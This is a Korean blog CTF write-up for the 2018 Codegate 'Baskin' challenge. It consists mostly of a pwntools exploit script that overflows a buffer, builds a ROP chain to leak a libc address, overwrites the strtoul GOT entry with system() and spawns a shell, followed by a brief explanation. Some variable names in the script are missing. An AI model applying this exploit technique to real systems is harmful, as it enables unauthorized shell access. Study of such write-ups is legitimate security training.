Notice
Recent Posts
Recent Comments
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
Today
Total
관리 메뉴

9oat's LAB

[2018 Codegate] Baskin 본문

Write Up/CTFs

[2018 Codegate] Baskin

90at 2018. 7. 11. 23:47
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
 
= '/home/goat/PROB/2018 Codegate/BaskinRobins31'
elf = ELF(b)
=  process(b)
 
pppr = p64(0x40087a)                    # pop rdi, pop rsi, pop rdx
 
write_plt = elf.plt['write']
write_got = elf.got['write']
read_plt = elf.plt['read']
strtoul_got = elf.got['strtoul']
 
 
pay = ''
pay += 'A'*0xb8
pay += pppr                        # leak write's libc addr
pay += p64(0x1)            
pay += p64(write_got)
pay += p64(0x8)
pay += p64(write_plt)                    
pay += pppr                        # GOT Overwriting strtoul -> system
pay += p64(0x0)
pay += p64(strtoul_got)
pay += p64(0x8)
pay += p64(read_plt)
pay += p64(0x4008a4)                    # your turn
 
c.recvuntil('3)')
c.send(pay)
c.recvuntil(':( \n')
 
libc_base = u64(c.recv(8))-0xf72b0            # get libc_base
system_addr = libc_base + 0x45390
 
print '[*] libc base addr :',hex(libc_base)
print '[*] system() addr :',hex(system_addr)
 
c.send(p64(system_addr))
 
c.recvuntil('3)')
c.send('/bin/sh\n')                    # <-> read
c.recvuntil('/bin/sh\n')
 
c.interactive()
cs


바이너리 내에 문자열을 받는 적당한 함수가 있으면, 그 함수의 got를 system 주소로 변조해도 된다.

위에선 strtoul 을 system 함수의 주소로 Overwriting.

저작자표시 비영리

'Write Up > CTFs' 카테고리의 다른 글

[2018 Codegate] Marimo  (0) 2018.07.11
[2017 HUST] Withdraw  (0) 2018.07.11
[PlaidCTF] ropasaurusrex  (0) 2017.07.05
공유하기 링크
'Write Up/CTFs' Related Articles more
Comments